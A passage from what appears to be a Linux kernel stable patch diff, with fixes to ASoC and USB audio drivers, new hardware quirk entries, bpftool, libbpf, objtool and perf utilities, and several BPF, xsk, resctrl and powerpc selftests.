+index 4922e6795b73f..32d20d351bbf7 100644
+--- a/sound/soc/fsl/fsl_mqs.c
++++ b/sound/soc/fsl/fsl_mqs.c
+@@ -210,10 +210,10 @@ static int fsl_mqs_probe(struct platform_device *pdev)
+ 		}
+ 
+ 		mqs_priv->regmap = syscon_node_to_regmap(gpr_np);
++		of_node_put(gpr_np);
+ 		if (IS_ERR(mqs_priv->regmap)) {
+ 			dev_err(&pdev->dev, "failed to get gpr regmap\n");
+-			ret = PTR_ERR(mqs_priv->regmap);
+-			goto err_free_gpr_np;
++			return PTR_ERR(mqs_priv->regmap);
+ 		}
+ 	} else {
+ 		regs = devm_platform_ioremap_resource(pdev, 0);
+@@ -242,8 +242,7 @@ static int fsl_mqs_probe(struct platform_device *pdev)
+ 	if (IS_ERR(mqs_priv->mclk)) {
+ 		dev_err(&pdev->dev, "failed to get the clock: %ld\n",
+ 			PTR_ERR(mqs_priv->mclk));
+-		ret = PTR_ERR(mqs_priv->mclk);
+-		goto err_free_gpr_np;
++		return PTR_ERR(mqs_priv->mclk);
+ 	}
+ 
+ 	dev_set_drvdata(&pdev->dev, mqs_priv);
+@@ -252,13 +251,9 @@ static int fsl_mqs_probe(struct platform_device *pdev)
+ 	ret = devm_snd_soc_register_component(&pdev->dev, &soc_codec_fsl_mqs,
+ 			&fsl_mqs_dai, 1);
+ 	if (ret)
+-		goto err_free_gpr_np;
+-	return 0;
+-
+-err_free_gpr_np:
+-	of_node_put(gpr_np);
++		return ret;
+ 
+-	return ret;
++	return 0;
+ }
+ 
+ static int fsl_mqs_remove(struct platform_device *pdev)
+diff --git a/sound/soc/intel/boards/bytcr_rt5640.c b/sound/soc/intel/boards/bytcr_rt5640.c
+index 4f46f52c38e44..783c201259921 100644
+--- a/sound/soc/intel/boards/bytcr_rt5640.c
++++ b/sound/soc/intel/boards/bytcr_rt5640.c
+@@ -533,6 +533,18 @@ static int byt_rt5640_aif1_hw_params(struct snd_pcm_substream *substream,
+ 
+ /* Please keep this list alphabetically sorted */
+ static const struct dmi_system_id byt_rt5640_quirk_table[] = {
++	{	/* Acer Iconia One 7 B1-750 */
++		.matches = {
++			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Insyde"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "VESPA2"),
++		},
++		.driver_data = (void *)(BYT_RT5640_DMIC1_MAP |
++					BYT_RT5640_JD_SRC_JD1_IN4P |
++					BYT_RT5640_OVCD_TH_1500UA |
++					BYT_RT5640_OVCD_SF_0P75 |
++					BYT_RT5640_SSP0_AIF1 |
++					BYT_RT5640_MCLK_EN),
++	},
+ 	{	/* Acer Iconia Tab 8 W1-810 */
+ 		.matches = {
+ 			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Acer"),
+diff --git a/sound/soc/intel/boards/sof_sdw.c b/sound/soc/intel/boards/sof_sdw.c
+index ee9857dc3135d..d4f92bb5e29f8 100644
+--- a/sound/soc/intel/boards/sof_sdw.c
++++ b/sound/soc/intel/boards/sof_sdw.c
+@@ -213,6 +213,17 @@ static const struct dmi_system_id sof_sdw_quirk_table[] = {
+ 					SOF_SDW_PCH_DMIC |
+ 					RT711_JD1),
+ 	},
++	{
++		/* NUC15 'Rooks County' LAPRC510 and LAPRC710 skews */
++		.callback = sof_sdw_quirk_cb,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Intel(R) Client Systems"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "LAPRC"),
++		},
++		.driver_data = (void *)(SOF_SDW_TGL_HDMI |
++					SOF_SDW_PCH_DMIC |
++					RT711_JD2_100K),
++	},
+ 	/* TigerLake-SDCA devices */
+ 	{
+ 		.callback = sof_sdw_quirk_cb,
+diff --git a/sound/soc/intel/common/soc-acpi-intel-adl-match.c b/sound/soc/intel/common/soc-acpi-intel-adl-match.c
+index 0102574025e90..6e21e1640acfa 100644
+--- a/sound/soc/intel/common/soc-acpi-intel-adl-match.c
++++ b/sound/soc/intel/common/soc-acpi-intel-adl-match.c
+@@ -354,6 +354,20 @@ static const struct snd_soc_acpi_link_adr adl_sdw_rt711_link0_rt1316_link3[] = {
+ 	{}
+ };
+ 
++static const struct snd_soc_acpi_link_adr adl_sdw_rt711_link0_rt1316_link2[] = {
++	{
++		.mask = BIT(0),
++		.num_adr = ARRAY_SIZE(rt711_sdca_0_adr),
++		.adr_d = rt711_sdca_0_adr,
++	},
++	{
++		.mask = BIT(2),
++		.num_adr = ARRAY_SIZE(rt1316_2_single_adr),
++		.adr_d = rt1316_2_single_adr,
++	},
++	{}
++};
++
+ static const struct snd_soc_acpi_adr_device mx8373_2_adr[] = {
+ 	{
+ 		.adr = 0x000223019F837300ull,
+@@ -612,6 +626,12 @@ struct snd_soc_acpi_mach snd_soc_acpi_intel_adl_sdw_machines[] = {
+ 		.drv_name = "sof_sdw",
+ 		.sof_tplg_filename = "sof-adl-rt711-l0-rt1316-l3.tplg",
+ 	},
++	{
++		.link_mask = 0x5, /* 2 active links required */
++		.links = adl_sdw_rt711_link0_rt1316_link2,
++		.drv_name = "sof_sdw",
++		.sof_tplg_filename = "sof-adl-rt711-l0-rt1316-l2.tplg",
++	},
+ 	{
+ 		.link_mask = 0x1, /* link0 required */
+ 		.links = adl_rvp,
+diff --git a/sound/soc/soc-compress.c b/sound/soc/soc-compress.c
+index e7aa6f360cabe..d649b0cf4744f 100644
+--- a/sound/soc/soc-compress.c
++++ b/sound/soc/soc-compress.c
+@@ -622,6 +622,9 @@ int snd_soc_new_compress(struct snd_soc_pcm_runtime *rtd, int num)
+ 			return ret;
+ 		}
+ 
++		/* inherit atomicity from DAI link */
++		be_pcm->nonatomic = rtd->dai_link->nonatomic;
++
+ 		rtd->pcm = be_pcm;
+ 		rtd->fe_compr = 1;
+ 		if (rtd->dai_link->dpcm_playback)
+diff --git a/sound/soc/soc-pcm.c b/sound/soc/soc-pcm.c
+index 35a16c3f9591b..7a486ca9633c1 100644
+--- a/sound/soc/soc-pcm.c
++++ b/sound/soc/soc-pcm.c
+@@ -1649,10 +1649,14 @@ static void dpcm_runtime_setup_fe(struct snd_pcm_substream *substream)
+ 	struct snd_pcm_hardware *hw = &runtime->hw;
+ 	struct snd_soc_dai *dai;
+ 	int stream = substream->stream;
++	u64 formats = hw->formats;
+ 	int i;
+ 
+ 	soc_pcm_hw_init(hw);
+ 
++	if (formats)
++		hw->formats &= formats;
++
+ 	for_each_rtd_cpu_dais(fe, i, dai) {
+ 		struct snd_soc_pcm_stream *cpu_stream;
+ 
+diff --git a/sound/usb/quirks-table.h b/sound/usb/quirks-table.h
+index 271884e350035..efb4a3311cc59 100644
+--- a/sound/usb/quirks-table.h
++++ b/sound/usb/quirks-table.h
+@@ -3884,6 +3884,64 @@ YAMAHA_DEVICE(0x7010, "UB99"),
+ 	}
+ },
+ 
++{
++	/*
++	 * PIONEER DJ DDJ-800
++	 * PCM is 6 channels out, 6 channels in @ 44.1 fixed
++	 * The Feedback for the output is the input
++	 */
++	USB_DEVICE_VENDOR_SPEC(0x2b73, 0x0029),
++		.driver_info = (unsigned long) &(const struct snd_usb_audio_quirk) {
++		.ifnum = QUIRK_ANY_INTERFACE,
++		.type = QUIRK_COMPOSITE,
++		.data = (const struct snd_usb_audio_quirk[]) {
++			{
++				.ifnum = 0,
++				.type = QUIRK_AUDIO_FIXED_ENDPOINT,
++				.data = &(const struct audioformat) {
++					.formats = SNDRV_PCM_FMTBIT_S24_3LE,
++					.channels = 6,
++					.iface = 0,
++					.altsetting = 1,
++					.altset_idx = 1,
++					.endpoint = 0x01,
++					.ep_attr = USB_ENDPOINT_XFER_ISOC|
++						USB_ENDPOINT_SYNC_ASYNC,
++					.rates = SNDRV_PCM_RATE_44100,
++					.rate_min = 44100,
++					.rate_max = 44100,
++					.nr_rates = 1,
++					.rate_table = (unsigned int[]) { 44100 }
++				}
++			},
++			{
++				.ifnum = 0,
++				.type = QUIRK_AUDIO_FIXED_ENDPOINT,
++				.data = &(const struct audioformat) {
++					.formats = SNDRV_PCM_FMTBIT_S24_3LE,
++					.channels = 6,
++					.iface = 0,
++					.altsetting = 1,
++					.altset_idx = 1,
++					.endpoint = 0x82,
++					.ep_idx = 1,
++					.ep_attr = USB_ENDPOINT_XFER_ISOC|
++						USB_ENDPOINT_SYNC_ASYNC|
++					USB_ENDPOINT_USAGE_IMPLICIT_FB,
++					.rates = SNDRV_PCM_RATE_44100,
++					.rate_min = 44100,
++					.rate_max = 44100,
++					.nr_rates = 1,
++					.rate_table = (unsigned int[]) { 44100 }
++				}
++			},
++			{
++				.ifnum = -1
++			}
++		}
++	}
++},
++
+ /*
+  * MacroSilicon MS2100/MS2106 based AV capture cards
+  *
+diff --git a/tools/arch/x86/kcpuid/cpuid.csv b/tools/arch/x86/kcpuid/cpuid.csv
+index 4f1c4b0c29e98..9914bdf4fc9ec 100644
+--- a/tools/arch/x86/kcpuid/cpuid.csv
++++ b/tools/arch/x86/kcpuid/cpuid.csv
+@@ -184,8 +184,8 @@
+ 	 7,    0,  EBX,     27, avx512er, AVX512 Exponent Reciproca instr
+ 	 7,    0,  EBX,     28, avx512cd, AVX512 Conflict Detection instr
+ 	 7,    0,  EBX,     29, sha, Intel Secure Hash Algorithm Extensions instr
+-	 7,    0,  EBX,     26, avx512bw, AVX512 Byte & Word instr
+-	 7,    0,  EBX,     28, avx512vl, AVX512 Vector Length Extentions (VL)
++	 7,    0,  EBX,     30, avx512bw, AVX512 Byte & Word instr
++	 7,    0,  EBX,     31, avx512vl, AVX512 Vector Length Extentions (VL)
+ 	 7,    0,  ECX,      0, prefetchwt1, X
+ 	 7,    0,  ECX,      1, avx512vbmi, AVX512 Vector Byte Manipulation Instructions
+ 	 7,    0,  ECX,      2, umip, User-mode Instruction Prevention
+diff --git a/tools/bpf/bpftool/json_writer.c b/tools/bpf/bpftool/json_writer.c
+index 7fea83bedf488..bca5dd0a59e34 100644
+--- a/tools/bpf/bpftool/json_writer.c
++++ b/tools/bpf/bpftool/json_writer.c
+@@ -80,9 +80,6 @@ static void jsonw_puts(json_writer_t *self, const char *str)
+ 		case '"':
+ 			fputs("\\\"", self->out);
+ 			break;
+-		case '\'':
+-			fputs("\\\'", self->out);
+-			break;
+ 		default:
+ 			putc(*str, self->out);
+ 		}
+diff --git a/tools/bpf/bpftool/xlated_dumper.c b/tools/bpf/bpftool/xlated_dumper.c
+index 2d9cd6a7b3c84..d9386a1a4df4a 100644
+--- a/tools/bpf/bpftool/xlated_dumper.c
++++ b/tools/bpf/bpftool/xlated_dumper.c
+@@ -370,8 +370,15 @@ void dump_xlated_for_graph(struct dump_data *dd, void *buf_start, void *buf_end,
+ 	struct bpf_insn *insn_start = buf_start;
+ 	struct bpf_insn *insn_end = buf_end;
+ 	struct bpf_insn *cur = insn_start;
++	bool double_insn = false;
+ 
+ 	for (; cur <= insn_end; cur++) {
++		if (double_insn) {
++			double_insn = false;
++			continue;
++		}
++		double_insn = cur->code == (BPF_LD | BPF_IMM | BPF_DW);
++
+ 		printf("% 4d: ", (int)(cur - insn_start + start_idx));
+ 		print_bpf_insn(&cbs, cur, true);
+ 		if (cur != insn_end)
+diff --git a/tools/lib/bpf/gen_loader.c b/tools/lib/bpf/gen_loader.c
+index 23f5c46708f8f..b74c82bb831e6 100644
+--- a/tools/lib/bpf/gen_loader.c
++++ b/tools/lib/bpf/gen_loader.c
+@@ -804,11 +804,13 @@ static void emit_relo_ksym_btf(struct bpf_gen *gen, struct ksym_relo_desc *relo,
+ 		return;
+ 	/* try to copy from existing ldimm64 insn */
+ 	if (kdesc->ref > 1) {
+-		move_blob2blob(gen, insn + offsetof(struct bpf_insn, imm), 4,
+-			       kdesc->insn + offsetof(struct bpf_insn, imm));
+ 		move_blob2blob(gen, insn + sizeof(struct bpf_insn) + offsetof(struct bpf_insn, imm), 4,
+ 			       kdesc->insn + sizeof(struct bpf_insn) + offsetof(struct bpf_insn, imm));
+-		/* jump over src_reg adjustment if imm is not 0, reuse BPF_REG_0 from move_blob2blob */
++		move_blob2blob(gen, insn + offsetof(struct bpf_insn, imm), 4,
++			       kdesc->insn + offsetof(struct bpf_insn, imm));
++		/* jump over src_reg adjustment if imm (btf_id) is not 0, reuse BPF_REG_0 from move_blob2blob
++		 * If btf_id is zero, clear BPF_PSEUDO_BTF_ID flag in src_reg of ld_imm64 insn
++		 */
+ 		emit(gen, BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 3));
+ 		goto clear_src_reg;
+ 	}
+@@ -831,7 +833,7 @@ static void emit_relo_ksym_btf(struct bpf_gen *gen, struct ksym_relo_desc *relo,
+ 	emit(gen, BPF_STX_MEM(BPF_W, BPF_REG_8, BPF_REG_7,
+ 			      sizeof(struct bpf_insn) + offsetof(struct bpf_insn, imm)));
+ 	/* skip src_reg adjustment */
+-	emit(gen, BPF_JMP_IMM(BPF_JSGE, BPF_REG_7, 0, 3));
++	emit(gen, BPF_JMP_IMM(BPF_JA, 0, 0, 3));
+ clear_src_reg:
+ 	/* clear bpf_object__relocate_data's src_reg assignment, otherwise we get a verifier failure */
+ 	reg_mask = src_reg_mask();
+diff --git a/tools/objtool/check.c b/tools/objtool/check.c
+index 730b49e255e44..c2c350933a237 100644
+--- a/tools/objtool/check.c
++++ b/tools/objtool/check.c
+@@ -2757,17 +2757,6 @@ static int update_cfi_state(struct instruction *insn,
+ 				break;
+ 			}
+ 
+-			if (!cfi->drap && op->src.reg == CFI_SP &&
+-			    op->dest.reg == CFI_BP && cfa->base == CFI_SP &&
+-			    check_reg_frame_pos(&regs[CFI_BP], -cfa->offset + op->src.offset)) {
+-
+-				/* lea disp(%rsp), %rbp */
+-				cfa->base = CFI_BP;
+-				cfa->offset -= op->src.offset;
+-				cfi->bp_scratch = false;
+-				break;
+-			}
+-
+ 			if (op->src.reg == CFI_SP && cfa->base == CFI_SP) {
+ 
+ 				/* drap: lea disp(%rsp), %drap */
+diff --git a/tools/perf/util/auxtrace.c b/tools/perf/util/auxtrace.c
+index 6e60b6f06ab05..4445c5c2d4c5a 100644
+--- a/tools/perf/util/auxtrace.c
++++ b/tools/perf/util/auxtrace.c
+@@ -2443,6 +2443,7 @@ static int find_entire_kern_cb(void *arg, const char *name __maybe_unused,
+ 			       char type, u64 start)
+ {
+ 	struct sym_args *args = arg;
++	u64 size;
+ 
+ 	if (!kallsyms__is_function(type))
+ 		return 0;
+@@ -2452,7 +2453,9 @@ static int find_entire_kern_cb(void *arg, const char *name __maybe_unused,
+ 		args->start = start;
+ 	}
+ 	/* Don't know exactly where the kernel ends, so we add a page */
+-	args->size = round_up(start, page_size) + page_size - args->start;
++	size = round_up(start, page_size) + page_size - args->start;
++	if (size > args->size)
++		args->size = size;
+ 
+ 	return 0;
+ }
+diff --git a/tools/perf/util/intel-pt-decoder/intel-pt-decoder.c b/tools/perf/util/intel-pt-decoder/intel-pt-decoder.c
+index 0ac860c8dd2b8..7145c5890de02 100644
+--- a/tools/perf/util/intel-pt-decoder/intel-pt-decoder.c
++++ b/tools/perf/util/intel-pt-decoder/intel-pt-decoder.c
+@@ -1998,6 +1998,8 @@ static void intel_pt_calc_cbr(struct intel_pt_decoder *decoder)
+ 
+ 	decoder->cbr = cbr;
+ 	decoder->cbr_cyc_to_tsc = decoder->max_non_turbo_ratio_fp / cbr;
++	decoder->cyc_ref_timestamp = decoder->timestamp;
++	decoder->cycle_cnt = 0;
+ 
+ 	intel_pt_mtc_cyc_cnt_cbr(decoder);
+ }
+diff --git a/tools/testing/selftests/bpf/network_helpers.c b/tools/testing/selftests/bpf/network_helpers.c
+index 1f37adff7632c..1fa4672380a92 100644
+--- a/tools/testing/selftests/bpf/network_helpers.c
++++ b/tools/testing/selftests/bpf/network_helpers.c
+@@ -95,7 +95,7 @@ static int __start_server(int type, int protocol, const struct sockaddr *addr,
+ 	if (reuseport &&
+ 	    setsockopt(fd, SOL_SOCKET, SO_REUSEPORT, &on, sizeof(on))) {
+ 		log_err("Failed to set SO_REUSEPORT");
+-		return -1;
++		goto error_close;
+ 	}
+ 
+ 	if (bind(fd, addr, addrlen) < 0) {
+diff --git a/tools/testing/selftests/bpf/prog_tests/align.c b/tools/testing/selftests/bpf/prog_tests/align.c
+index 970f09156eb46..de27a29af2703 100644
+--- a/tools/testing/selftests/bpf/prog_tests/align.c
++++ b/tools/testing/selftests/bpf/prog_tests/align.c
+@@ -565,14 +565,14 @@ static struct bpf_align_test tests[] = {
+ 			/* New unknown value in R7 is (4n), >= 76 */
+ 			{14, "R7_w=scalar(umin=76,umax=1096,var_off=(0x0; 0x7fc))"},
+ 			/* Adding it to packet pointer gives nice bounds again */
+-			{16, "R5_w=pkt(id=3,off=0,r=0,umin=2,umax=1082,var_off=(0x2; 0xfffffffc)"},
++			{16, "R5_w=pkt(id=3,off=0,r=0,umin=2,umax=1082,var_off=(0x2; 0x7fc)"},
+ 			/* At the time the word size load is performed from R5,
+ 			 * its total fixed offset is NET_IP_ALIGN + reg->off (0)
+ 			 * which is 2.  Then the variable offset is (4n+2), so
+ 			 * the total offset is 4-byte aligned and meets the
+ 			 * load's requirements.
+ 			 */
+-			{20, "R5=pkt(id=3,off=0,r=4,umin=2,umax=1082,var_off=(0x2; 0xfffffffc)"},
++			{20, "R5=pkt(id=3,off=0,r=4,umin=2,umax=1082,var_off=(0x2; 0x7fc)"},
+ 		},
+ 	},
+ };
+diff --git a/tools/testing/selftests/bpf/prog_tests/cg_storage_multi.c b/tools/testing/selftests/bpf/prog_tests/cg_storage_multi.c
+index 621c572221918..63ee892bc7573 100644
+--- a/tools/testing/selftests/bpf/prog_tests/cg_storage_multi.c
++++ b/tools/testing/selftests/bpf/prog_tests/cg_storage_multi.c
+@@ -56,8 +56,9 @@ static bool assert_storage_noexist(struct bpf_map *map, const void *key)
+ 
+ static bool connect_send(const char *cgroup_path)
+ {
+-	bool res = true;
+ 	int server_fd = -1, client_fd = -1;
++	char message[] = "message";
++	bool res = true;
+ 
+ 	if (join_cgroup(cgroup_path))
+ 		goto out_clean;
+@@ -70,7 +71,10 @@ static bool connect_send(const char *cgroup_path)
+ 	if (client_fd < 0)
+ 		goto out_clean;
+ 
+-	if (send(client_fd, "message", strlen("message"), 0) < 0)
++	if (send(client_fd, &message, sizeof(message), 0) < 0)
++		goto out_clean;
++
++	if (read(server_fd, &message, sizeof(message)) < 0)
+ 		goto out_clean;
+ 
+ 	res = false;
+diff --git a/tools/testing/selftests/bpf/prog_tests/get_stackid_cannot_attach.c b/tools/testing/selftests/bpf/prog_tests/get_stackid_cannot_attach.c
+index 5308de1ed478e..2715c68301f52 100644
+--- a/tools/testing/selftests/bpf/prog_tests/get_stackid_cannot_attach.c
++++ b/tools/testing/selftests/bpf/prog_tests/get_stackid_cannot_attach.c
+@@ -65,6 +65,7 @@ void test_get_stackid_cannot_attach(void)
+ 	skel->links.oncpu = bpf_program__attach_perf_event(skel->progs.oncpu,
+ 							   pmu_fd);
+ 	ASSERT_OK_PTR(skel->links.oncpu, "attach_perf_event_callchain");
++	bpf_link__destroy(skel->links.oncpu);
+ 	close(pmu_fd);
+ 
+ 	/* add exclude_callchain_kernel, attach should fail */
+diff --git a/tools/testing/selftests/bpf/prog_tests/perf_event_stackmap.c b/tools/testing/selftests/bpf/prog_tests/perf_event_stackmap.c
+index 33144c9432aeb..f4aad35afae16 100644
+--- a/tools/testing/selftests/bpf/prog_tests/perf_event_stackmap.c
++++ b/tools/testing/selftests/bpf/prog_tests/perf_event_stackmap.c
+@@ -63,7 +63,8 @@ void test_perf_event_stackmap(void)
+ 			PERF_SAMPLE_BRANCH_NO_FLAGS |
+ 			PERF_SAMPLE_BRANCH_NO_CYCLES |
+ 			PERF_SAMPLE_BRANCH_CALL_STACK,
+-		.sample_period = 5000,
++		.freq = 1,
++		.sample_freq = read_perf_max_sample_freq(),
+ 		.size = sizeof(struct perf_event_attr),
+ 	};
+ 	struct perf_event_stackmap *skel;
+diff --git a/tools/testing/selftests/bpf/prog_tests/stacktrace_build_id_nmi.c b/tools/testing/selftests/bpf/prog_tests/stacktrace_build_id_nmi.c
+index f4ea1a215ce4d..704f7f6c3704a 100644
+--- a/tools/testing/selftests/bpf/prog_tests/stacktrace_build_id_nmi.c
++++ b/tools/testing/selftests/bpf/prog_tests/stacktrace_build_id_nmi.c
+@@ -2,21 +2,6 @@
+ #include <test_progs.h>
+ #include "test_stacktrace_build_id.skel.h"
+ 
+-static __u64 read_perf_max_sample_freq(void)
+-{
+-	__u64 sample_freq = 5000; /* fallback to 5000 on error */
+-	FILE *f;
+-	__u32 duration = 0;
+-
+-	f = fopen("/proc/sys/kernel/perf_event_max_sample_rate", "r");
+-	if (f == NULL)
+-		return sample_freq;
+-	CHECK(fscanf(f, "%llu", &sample_freq) != 1, "Get max sample rate",
+-		  "return default value: 5000,err %d\n", -errno);
+-	fclose(f);
+-	return sample_freq;
+-}
+-
+ void test_stacktrace_build_id_nmi(void)
+ {
+ 	int control_map_fd, stackid_hmap_fd, stackmap_fd;
+diff --git a/tools/testing/selftests/bpf/test_xsk.sh b/tools/testing/selftests/bpf/test_xsk.sh
+index d821fd0985049..4e3ec38cbe68c 100755
+--- a/tools/testing/selftests/bpf/test_xsk.sh
++++ b/tools/testing/selftests/bpf/test_xsk.sh
+@@ -118,6 +118,7 @@ setup_vethPairs() {
+ 	ip link add ${VETH0} numtxqueues 4 numrxqueues 4 type veth peer name ${VETH1} numtxqueues 4 numrxqueues 4
+ 	if [ -f /proc/net/if_inet6 ]; then
+ 		echo 1 > /proc/sys/net/ipv6/conf/${VETH0}/disable_ipv6
++		echo 1 > /proc/sys/net/ipv6/conf/${VETH1}/disable_ipv6
+ 	fi
+ 	if [[ $verbose -eq 1 ]]; then
+ 	        echo "setting up ${VETH1}: namespace: ${NS1}"
+diff --git a/tools/testing/selftests/bpf/testing_helpers.c b/tools/testing/selftests/bpf/testing_helpers.c
+index 9695318e8132d..9c3de39023f60 100644
+--- a/tools/testing/selftests/bpf/testing_helpers.c
++++ b/tools/testing/selftests/bpf/testing_helpers.c
+@@ -229,3 +229,23 @@ int bpf_test_load_program(enum bpf_prog_type type, const struct bpf_insn *insns,
+ 
+ 	return bpf_prog_load(type, NULL, license, insns, insns_cnt, &opts);
+ }
++
++__u64 read_perf_max_sample_freq(void)
++{
++	__u64 sample_freq = 5000; /* fallback to 5000 on error */
++	FILE *f;
++
++	f = fopen("/proc/sys/kernel/perf_event_max_sample_rate", "r");
++	if (f == NULL) {
++		printf("Failed to open /proc/sys/kernel/perf_event_max_sample_rate: err %d\n"
++		       "return default value: 5000\n", -errno);
++		return sample_freq;
++	}
++	if (fscanf(f, "%llu", &sample_freq) != 1) {
++		printf("Failed to parse /proc/sys/kernel/perf_event_max_sample_rate: err %d\n"
++		       "return default value: 5000\n", -errno);
++	}
++
++	fclose(f);
++	return sample_freq;
++}
+diff --git a/tools/testing/selftests/bpf/testing_helpers.h b/tools/testing/selftests/bpf/testing_helpers.h
+index 6ec00bf79cb55..eb8790f928e4c 100644
+--- a/tools/testing/selftests/bpf/testing_helpers.h
++++ b/tools/testing/selftests/bpf/testing_helpers.h
+@@ -20,3 +20,5 @@ struct test_filter_set;
+ int parse_test_list(const char *s,
+ 		    struct test_filter_set *test_set,
+ 		    bool is_glob_pattern);
++
++__u64 read_perf_max_sample_freq(void);
+diff --git a/tools/testing/selftests/bpf/xskxceiver.c b/tools/testing/selftests/bpf/xskxceiver.c
+index 8d5d9b94b020b..cd6578928c28a 100644
+--- a/tools/testing/selftests/bpf/xskxceiver.c
++++ b/tools/testing/selftests/bpf/xskxceiver.c
+@@ -649,7 +649,6 @@ static struct pkt_stream *pkt_stream_generate(struct xsk_umem_info *umem, u32 nb
+ 	if (!pkt_stream)
+ 		exit_with_error(ENOMEM);
+ 
+-	pkt_stream->nb_pkts = nb_pkts;
+ 	for (i = 0; i < nb_pkts; i++) {
+ 		pkt_set(umem, &pkt_stream->pkts[i], (i % umem->num_frames) * umem->frame_size,
+ 			pkt_len);
+@@ -1141,7 +1140,14 @@ static int validate_rx_dropped(struct ifobject *ifobject)
+ 	if (err)
+ 		return TEST_FAILURE;
+ 
+-	if (stats.rx_dropped == ifobject->pkt_stream->nb_pkts / 2)
++	/* The receiver calls getsockopt after receiving the last (valid)
++	 * packet which is not the final packet sent in this test (valid and
++	 * invalid packets are sent in alternating fashion with the final
++	 * packet being invalid). Since the last packet may or may not have
++	 * been dropped already, both outcomes must be allowed.
++	 */
++	if (stats.rx_dropped == ifobject->pkt_stream->nb_pkts / 2 ||
++	    stats.rx_dropped == ifobject->pkt_stream->nb_pkts / 2 - 1)
+ 		return TEST_PASS;
+ 
+ 	return TEST_FAILURE;
+@@ -1661,6 +1667,7 @@ static void testapp_single_pkt(struct test_spec *test)
+ 
+ static void testapp_invalid_desc(struct test_spec *test)
+ {
++	u64 umem_size = test->ifobj_tx->umem->num_frames * test->ifobj_tx->umem->frame_size;
+ 	struct pkt pkts[] = {
+ 		/* Zero packet address allowed */
+ 		{0, PKT_SIZE, 0, true},
+@@ -1671,9 +1678,9 @@ static void testapp_invalid_desc(struct test_spec *test)
+ 		/* Packet too large */
+ 		{0x2000, XSK_UMEM__INVALID_FRAME_SIZE, 0, false},
+ 		/* After umem ends */
+-		{UMEM_SIZE, PKT_SIZE, 0, false},
++		{umem_size, PKT_SIZE, 0, false},
+ 		/* Straddle the end of umem */
+-		{UMEM_SIZE - PKT_SIZE / 2, PKT_SIZE, 0, false},
++		{umem_size - PKT_SIZE / 2, PKT_SIZE, 0, false},
+ 		/* Straddle a page boundrary */
+ 		{0x3000 - PKT_SIZE / 2, PKT_SIZE, 0, false},
+ 		/* Straddle a 2K boundrary */
+@@ -1691,8 +1698,8 @@ static void testapp_invalid_desc(struct test_spec *test)
+ 	}
+ 
+ 	if (test->ifobj_tx->shared_umem) {
+-		pkts[4].addr += UMEM_SIZE;
+-		pkts[5].addr += UMEM_SIZE;
++		pkts[4].addr += umem_size;
++		pkts[5].addr += umem_size;
+ 	}
+ 
+ 	pkt_stream_generate_custom(test, pkts, ARRAY_SIZE(pkts));
+diff --git a/tools/testing/selftests/bpf/xskxceiver.h b/tools/testing/selftests/bpf/xskxceiver.h
+index edb76d2def9fe..292fc943b8fdf 100644
+--- a/tools/testing/selftests/bpf/xskxceiver.h
++++ b/tools/testing/selftests/bpf/xskxceiver.h
+@@ -52,7 +52,6 @@
+ #define THREAD_TMOUT 3
+ #define DEFAULT_PKT_CNT (4 * 1024)
+ #define DEFAULT_UMEM_BUFFERS (DEFAULT_PKT_CNT / 4)
+-#define UMEM_SIZE (DEFAULT_UMEM_BUFFERS * XSK_UMEM__DEFAULT_FRAME_SIZE)
+ #define RX_FULL_RXQSIZE 32
+ #define UMEM_HEADROOM_TEST_SIZE 128
+ #define XSK_UMEM__INVALID_FRAME_SIZE (XSK_UMEM__DEFAULT_FRAME_SIZE + 1)
+diff --git a/tools/testing/selftests/mount_setattr/mount_setattr_test.c b/tools/testing/selftests/mount_setattr/mount_setattr_test.c
+index 8c5fea68ae677..969647228817b 100644
+--- a/tools/testing/selftests/mount_setattr/mount_setattr_test.c
++++ b/tools/testing/selftests/mount_setattr/mount_setattr_test.c
+@@ -18,6 +18,7 @@
+ #include <grp.h>
+ #include <stdbool.h>
+ #include <stdarg.h>
++#include <linux/mount.h>
+ 
+ #include "../kselftest_harness.h"
+ 
+diff --git a/tools/testing/selftests/powerpc/pmu/sampling_tests/mmcra_thresh_marked_sample_test.c b/tools/testing/selftests/powerpc/pmu/sampling_tests/mmcra_thresh_marked_sample_test.c
+index 022cc1655eb52..75527876ad3c1 100644
+--- a/tools/testing/selftests/powerpc/pmu/sampling_tests/mmcra_thresh_marked_sample_test.c
++++ b/tools/testing/selftests/powerpc/pmu/sampling_tests/mmcra_thresh_marked_sample_test.c
+@@ -63,9 +63,9 @@ static int mmcra_thresh_marked_sample(void)
+ 			get_mmcra_thd_stop(get_reg_value(intr_regs, "MMCRA"), 4));
+ 	FAIL_IF(EV_CODE_EXTRACT(event.attr.config, marked) !=
+ 			get_mmcra_marked(get_reg_value(intr_regs, "MMCRA"), 4));
+-	FAIL_IF(EV_CODE_EXTRACT(event.attr.config, sample >> 2) !=
++	FAIL_IF((EV_CODE_EXTRACT(event.attr.config, sample) >> 2) !=
+ 			get_mmcra_rand_samp_elig(get_reg_value(intr_regs, "MMCRA"), 4));
+-	FAIL_IF(EV_CODE_EXTRACT(event.attr.config, sample & 0x3) !=
++	FAIL_IF((EV_CODE_EXTRACT(event.attr.config, sample) & 0x3) !=
+ 			get_mmcra_sample_mode(get_reg_value(intr_regs, "MMCRA"), 4));
+ 	FAIL_IF(EV_CODE_EXTRACT(event.attr.config, sm) !=
+ 			get_mmcra_sm(get_reg_value(intr_regs, "MMCRA"), 4));
+diff --git a/tools/testing/selftests/resctrl/cache.c b/tools/testing/selftests/resctrl/cache.c
+index 68ff856d36f0b..0485863a169f2 100644
+--- a/tools/testing/selftests/resctrl/cache.c
++++ b/tools/testing/selftests/resctrl/cache.c
+@@ -244,10 +244,12 @@ int cat_val(struct resctrl_val_param *param)
+ 	while (1) {
+ 		if (!strncmp(resctrl_val, CAT_STR, sizeof(CAT_STR))) {
+ 			ret = param->setup(1, param);
+-			if (ret) {
++			if (ret == END_OF_TESTS) {
+ 				ret = 0;
+ 				break;
+ 			}
++			if (ret < 0)
++				break;
+ 			ret = reset_enable_llc_perf(bm_pid, param->cpu_no);
+ 			if (ret)
+ 				break;
+diff --git a/tools/testing/selftests/resctrl/cat_test.c b/tools/testing/selftests/resctrl/cat_test.c
+index 1c5e90c632548..2d3c7c77ab6cb 100644
+--- a/tools/testing/selftests/resctrl/cat_test.c
